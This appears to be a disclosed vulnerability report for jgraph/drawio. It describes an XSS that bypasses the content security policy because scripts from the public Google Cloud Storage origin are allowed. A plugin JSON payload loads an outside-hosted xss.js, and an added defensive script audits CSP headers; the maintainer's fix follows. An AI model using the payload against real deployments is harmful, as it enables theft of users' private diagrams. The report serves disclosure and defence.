XSS with CSP bypass on WEB instances in jgraph/drawio

Valid

Reported on

Sep 5th 2022


📝 Description

Drawio WEB instances allow https://storage.googleapis.com in the CSP script-src. Abusing the XSS found in this report, it is possible to bypass the CSP and leak private diagram content.

🕵️‍♂️ Proof of Concept

On the web application side, JavaScript execution is restricted by the following CSP:

...
script-src https://www.dropbox.com https://api.trello.com 'self' https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com 'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes=' 'sha256-r/ILW7KMSJxeo9EYqCTzZyCT0PZ9gHN1BLgki7vpR+A=' 'sha256-5DtSB5mj34lxcEf+HFWbBLEF49xxJaKnWGDWa/utwQA=' 'sha256-vS/MxlVD7nbY7AnV+0t1Ap338uF7vrcs7y23KjERhKc='
...

Because the policy allows loading scripts from https://storage.googleapis.com, which is the shared public URL for Google Cloud Storage buckets, any script hosted in a bucket can be loaded and executed in the page.

{
  "plugins": [
    "https://storage.googleapis.com/bypass_csp/xss.js"
  ]
}

xss_web.png
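As an added example (not code from the report or from the drawio project), the following audit parses a CSP header, flags script-src entries whose host is shared public object storage such as the bucket origin above, and rebuilds the header with those entries removed, which is the fix the maintainer applied. The host list and the sample header are constructed for this example.

```javascript
// Added example (not from the drawio project): audit a CSP header for script-src
// entries that point at shared public object storage, where any account can host
// a file under the same origin, and produce a tightened header without them.
// The host list is a constructed assumption for this example, not an exhaustive one.
const SHARED_UPLOAD_HOSTS = ["storage.googleapis.com"];

// Parse a CSP header into { directive: [source, ...] }.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// Hostname of a host-source expression; null for keywords, hashes, nonces, scheme-only sources.
function hostOf(source) {
  if (source.startsWith("'") || /^[a-z][a-z0-9+.-]*:$/i.test(source)) return null;
  const m = /^(?:[a-z][a-z0-9+.-]*:\/\/)?([^\/:]+)/i.exec(source);
  return m ? m[1].toLowerCase() : null;
}

// script-src entries (falling back to default-src) whose host is shared upload storage.
// Path-scoped entries are flagged too, so a reviewer confirms the site owns that bucket.
function findSharedUploadScriptSources(header) {
  const policy = parseCsp(header);
  const sources = policy["script-src"] || policy["default-src"] || [];
  return sources.filter((src) => {
    const host = hostOf(src);
    return host !== null &&
      SHARED_UPLOAD_HOSTS.some((h) => host === h || host.endsWith("." + h));
  });
}

// Rebuild the header with the flagged script-src entries removed.
function stripSharedUploadScriptSources(header) {
  const flagged = new Set(findSharedUploadScriptSources(header));
  return header.split(";")
    .map((part) => part.trim().split(/\s+/).filter(Boolean))
    .filter((tokens) => tokens.length > 0)
    .map((tokens) => tokens[0].toLowerCase() === "script-src"
      ? tokens.filter((t, i) => i === 0 || !flagged.has(t)).join(" ")
      : tokens.join(" "))
    .join("; ");
}

// Constructed sample built from the script-src shown in the report above.
const SAMPLE_CSP = "default-src 'self'; script-src https://www.dropbox.com https://api.trello.com 'self' " +
  "https://viewer.diagrams.net https://storage.googleapis.com https://apis.google.com https://*.pusher.com " +
  "'sha256-AVuOIxynOo/05KDLjyp0AoBE+Gt/KE1/vh2pS+yfqes='; img-src * data:";
console.log(findSharedUploadScriptSources(SAMPLE_CSP)); // [ 'https://storage.googleapis.com' ]
console.log(stripSharedUploadScriptSources(SAMPLE_CSP));
```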

Impact

An attacker could use it to access any user's confidential content.

We are processing your report and will contact the jgraph/drawio team within 24 hours. 3 months ago
David Benson validated this vulnerability 3 months ago
Mizu has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
David Benson marked this as fixed in 20.2.8 with commit 59887e 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
David Benson
3 months ago

Maintainer


Thanks for report, entry has been removed from CSP.
